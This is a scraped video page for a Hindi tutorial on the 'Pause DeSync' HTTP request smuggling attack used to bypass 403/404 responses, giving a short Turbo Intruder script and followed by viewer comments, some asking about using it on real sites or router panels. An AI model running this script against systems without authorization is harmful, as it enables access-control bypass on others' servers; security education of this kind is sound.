Pause DeSync Attack : Access 403 Forbidden / 404 Not Found |

  Рет қаралды 17,853

Spin The Hack

Spin The Hack

Жыл бұрын

In this video we are going to learn What is Pause DeSync Attack and how to find this type of vulnerabilities. These attack is part of HTTP REQUEST SMUGGLING.
Code Used:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=500,
pipeline=False
)
engine.queue(target.req, pauseMarker=['

'], pauseTime=61000)
engine.queue(target.req)
def handleResponse(req, interesting):
table.add(req)
🔴 ** BE MY FRIEND **
🌟Web:
🌟Instagram(Personal): / thecyberzeel
🌟Instagram(Spin The Hack): / spinthehack
🌟Twitter: / thecyberzeel
🔴 ** ABOUT THE CHANNEL **
At Spin The Hack I document my career and teach you what I learn in easiest explanation.
Spin The Hack is one of the leading Indian educational enterprise aimed at helping people learn and understand cybersecurity in better and simplest way.
At Spin The Hack, We serve the best possible Cybersecurity and Penetration Testing content through our website and KZbin Channel, help students grasp all the concept that matter and are related to field.
‼This channel focuses only on education and doesn't promote anything that is unethical. On this channel, I explore the field of Cybersecurity so that it helps the audience to learn and earn at the same time.
🌟Penetration Testing Videos in Hindi
🌟Bug Bounty Hunting Videos in Hindi
🌟Tips and Tricks related to Cybersecurity in Hindi
🌟Forensics Coverage and Tutorials in Hindi
🌟 Useful Cybersecurity News in Hindi
________________________________________
For Business Inquiry-: contact@spinthehack.in
________________________________________
🔴STOP: Before Starting This video, Keep in mind that this video is just for Educational purposes and nothing illegal is promoted here. We, along with KZbin, are not responsible for any kind of action taken by you using this video.🔴

Пікірлер: 76
@periyamaruthuk1785
@periyamaruthuk1785 Ай бұрын
Very Well Explained.... Even foreign Mentors failed to explain clearly...
@0day_01
@0day_01 Жыл бұрын
Never heard of this vulnerability 😯 Today we know because of you ❤️ you explained it very well 👍
@Rinki1425
@Rinki1425 Жыл бұрын
Maine zeel bhai ko bhai bolne se bacho bolte hue ki journey dekhi hai
@shivpratapsingh2084
@shivpratapsingh2084 Жыл бұрын
Agaaaain!! A great video sir. Now my mind is getting fan of yours! 🔥😉
@gamegunner9079
@gamegunner9079 Жыл бұрын
Always a great content as usual
@vivaanvivaan3920
@vivaanvivaan3920 Жыл бұрын
Great knowledgeable information sir....love you
@dev__004
@dev__004 Жыл бұрын
What a great video. Thank you cyberzeel bhai
@jatinchudasama3252
@jatinchudasama3252 Жыл бұрын
💯👍Nice Bro . Excellent effort & content .
@sparkhar7041
@sparkhar7041 Жыл бұрын
Thank you so much sir u r awesome keep this up👍
@dr_coding
@dr_coding Жыл бұрын
Always useful 🔥
@RameshShresthanp
@RameshShresthanp Жыл бұрын
hero spinthehack ❤
@Watchdog1122
@Watchdog1122 Жыл бұрын
Thanks much needed❤️
@idkk403
@idkk403 11 ай бұрын
You're seriously amazing!!!!!!
@shahidhamid6008
@shahidhamid6008 Жыл бұрын
Excellent video ✨🔥
@pglmanu1837
@pglmanu1837 Жыл бұрын
Ap bhut acha sikhate ho
@saheebakhan2614
@saheebakhan2614 Жыл бұрын
Mja aya bro ,
@hiteshvarma3203
@hiteshvarma3203 Жыл бұрын
Thank you brother 👍
@raunakyadav7478
@raunakyadav7478 Жыл бұрын
Usefull trick thanks 😊😊
@h4s4n_ma
@h4s4n_ma Жыл бұрын
Very helpful 🔥
@moinkhan07890
@moinkhan07890 Жыл бұрын
Hello sir my Name is Shaikh Moin i am from Dubai really i am learning with the help you Sir thank you so much.
@jeminkhunt979
@jeminkhunt979 Жыл бұрын
Thank you bhai🔥🔥
@devrajdhiwar9028
@devrajdhiwar9028 Жыл бұрын
Great video 🥰❣️❣️✨✨✨
@zeropixell3152
@zeropixell3152 Жыл бұрын
Great brother 💞💞💞🇧🇩🇧🇩🇧🇩
@darshanchauhan5891
@darshanchauhan5891 Жыл бұрын
Thanks 😊 bro
@debashismandal7945
@debashismandal7945 Жыл бұрын
Awesome 😍
@hyp3d35
@hyp3d35 Жыл бұрын
Your quality of content is increasing day by day, keep up the hard work🫶🏼
@ayushkhatkar
@ayushkhatkar Жыл бұрын
Thanks!
@Scorpion_Yug
@Scorpion_Yug 8 ай бұрын
Kya re jyada paise hai 😂
@ayushkhatkar
@ayushkhatkar 8 ай бұрын
​@@Scorpion_Yugyes i have money to support a good content creator
@WhiteHat80
@WhiteHat80 6 ай бұрын
Kya re itna bhikari hai 😂😂 ​@@Scorpion_Yug
@musicbeast-hd9sy
@musicbeast-hd9sy Жыл бұрын
🔥🔥🔥🔥🔥🔥
@mdatheeb
@mdatheeb Жыл бұрын
Hi brother! Your contents are amazing. Could you please add subtitles for your videos in English, bcz unfortunately I didn't understand Hindi!
@NoName_silent
@NoName_silent Жыл бұрын
Hi sir bhot acha 👌🏻, Kya isi tarha wifi ka admin b hasil kar sakte hain kese video bnae
@Anonymousm467
@Anonymousm467 Жыл бұрын
Wooo Bhai 👌👌👌👌
@abdulx01
@abdulx01 Жыл бұрын
Nice. 👍
@vickyrajwade8665
@vickyrajwade8665 Жыл бұрын
Great 👌👌👌👌👌👌
@technicalmuzammil2496
@technicalmuzammil2496 Жыл бұрын
And Thanks for Everything
@Pankaj_RDJ_with_Ehical_Hacking
@Pankaj_RDJ_with_Ehical_Hacking Жыл бұрын
thanks sir ji
@fitwithme_00
@fitwithme_00 Жыл бұрын
nice 💯
@baravind719
@baravind719 Жыл бұрын
Nice ☺️
@devansh2587
@devansh2587 Жыл бұрын
❣️🔥
@0mnaik275
@0mnaik275 Жыл бұрын
Bro i can say that i have learned the whole bug bounty in deep from you but still unable to find a bug it's demotivating i have given atleast 7-8 months to study things still no results 🥲🥲can you please take bug bounty to advanced level , hope you will react to my comment a lots of love ❤️from my side you do great work
@SpinTheHack
@SpinTheHack Жыл бұрын
Wait wait wait is your key♥️...my blessings with you
@DedHACKER
@DedHACKER Жыл бұрын
love you vera
@nur_texbyemon7043
@nur_texbyemon7043 9 ай бұрын
vai mere burp suite pro 2023 par same command diye ak mere target website par leken error aya ki: user python error
@rajanbalami383
@rajanbalami383 Жыл бұрын
zeel sir api key exploitation pe bhi ek video banadena ho sakey tow please.
@4T7TABAHIYT
@4T7TABAHIYT Жыл бұрын
bro we can u this attack on any http or https protected website
@rajeshsagar3912
@rajeshsagar3912 Жыл бұрын
what about nginx bro....btw great explanation
@VikasSharma-xo3iz
@VikasSharma-xo3iz 5 ай бұрын
Syntex error: (mismatch input 'engine' expecting indent why this error occurred, put same code for 403 forbidden
@kollagaming7058
@kollagaming7058 Жыл бұрын
Bro what is the name of extension in github I can't find any turbo intruder extension in github bro Please tell me bro
@Shafin_M_21
@Shafin_M_21 5 ай бұрын
is it possible to access router admin panel by this way without password
@Car17138
@Car17138 Жыл бұрын
🙂🙂
@yogeshgodasestar928
@yogeshgodasestar928 10 ай бұрын
Bhai turbo introdure nhi aa raha mere burpsuit me
@GauravSharma-ks9eq
@GauravSharma-ks9eq Жыл бұрын
I have a question, in slot booking systems the backend server has limited no. Of slots , how can we create our own space and get a reservation in a fully booked slot .
@mdkhairulislam5276
@mdkhairulislam5276 Жыл бұрын
Good job Sir
@dollaaaar
@dollaaaar Жыл бұрын
issa possible hai kya ki har 403 bypass ho sakta recently i tried for rce and 403 forbidden aa raha tha respose mein usko kaise bypass karu
@Scorpion_Yug
@Scorpion_Yug 8 ай бұрын
Same thing bro
@ganeshborse-ig6xn
@ganeshborse-ig6xn Жыл бұрын
SwarYogi The( Cyber Zeel) aap hi ho kya???
@ishtiyaqueshaikh5127
@ishtiyaqueshaikh5127 Жыл бұрын
Bhai video to bahot achchi banate ho lekin bahot fast banate ho
@Ashokkumar-oj8st
@Ashokkumar-oj8st Жыл бұрын
Muje to slow lgta h me fast krke dekhta hu 😂
@technicalmuzammil2496
@technicalmuzammil2496 Жыл бұрын
Very help full Brother.... Kia ap expert level par Bug bounty sika sakte hai?
@abhimusic9178
@abhimusic9178 Жыл бұрын
if u know English fabour other youtube channels like farah hawà ,phd security, nahamsec but cyberzeel bhai bhi ryt h apne jgh pe agr tmhe advance jana h to phle inse basics smjo then switch kro in sb pe
@shriyanssudhi4545
@shriyanssudhi4545 Жыл бұрын
These things are in one of the advanced things, the best thing of STH :)
@abhimusic9178
@abhimusic9178 Жыл бұрын
@@shriyanssudhi4545 but if agr ye jyda deep jana chahta h to ise switch krna hi prega other youtubers pe bhaiya batate h acha help krta h un sb ko smjhne me maine basic inse hi sikha h
@shriyanssudhi4545
@shriyanssudhi4545 Жыл бұрын
@@abhimusic9178 this is starting of advanced :)
@abhimusic9178
@abhimusic9178 Жыл бұрын
@@shriyanssudhi4545 for more practical demonstration you do by your own 😂i m not recommended any hint other than this just solve all labs watching videos
@kollagaming7058
@kollagaming7058 Жыл бұрын
Bro.. Can I do this attack on real websites ? Is it worth or not ? Tell me bro
@rajanbalami383
@rajanbalami383 Жыл бұрын
anyone here who can tell me how can we exploit any private api key??
@dev__004
@dev__004 Жыл бұрын
You can access the srvice of the api key and make changes to that service. Thats the vuln i think
@m2tech795
@m2tech795 Жыл бұрын
Sir wsp grup
@viresh222
@viresh222 Ай бұрын
Baccho 😆🤣🤣
HTTP Desync Attack Explained With Paper
13:00
LiveUnderflow
Рет қаралды 13 М.
A teacher captured the cutest moment at the nursery #shorts
00:33
Fabiosa Stories
Рет қаралды 55 МЛН
No empty
00:35
Mamasoboliha
Рет қаралды 10 МЛН
MISS CIRCLE STUDENTS BULLY ME!
00:12
Andreas Eskander
Рет қаралды 20 МЛН
Learn Nuclei in 30 minutes - DEF CON Nuclei Demo
35:48
ProjectDiscovery
Рет қаралды 9 М.
Client-side desync vulnerabilities - a breakthrough in request smuggling techniques
12:51
Bug Bounty Reports Explained
Рет қаралды 16 М.
Not Found 404 And 403 Forbidden Bypass Sql Injection
22:12
HTTP Request Smuggling - False Positives
16:40
PinkDraconian
Рет қаралды 12 М.
Is CCTV Camera Hacking Possible? Full Process Explained
22:01
WsCube Cyber Security
Рет қаралды 279 М.
Access Location, Camera  & Mic of any Device 🌎🎤📍📷
15:48
zSecurity
Рет қаралды 2,3 МЛН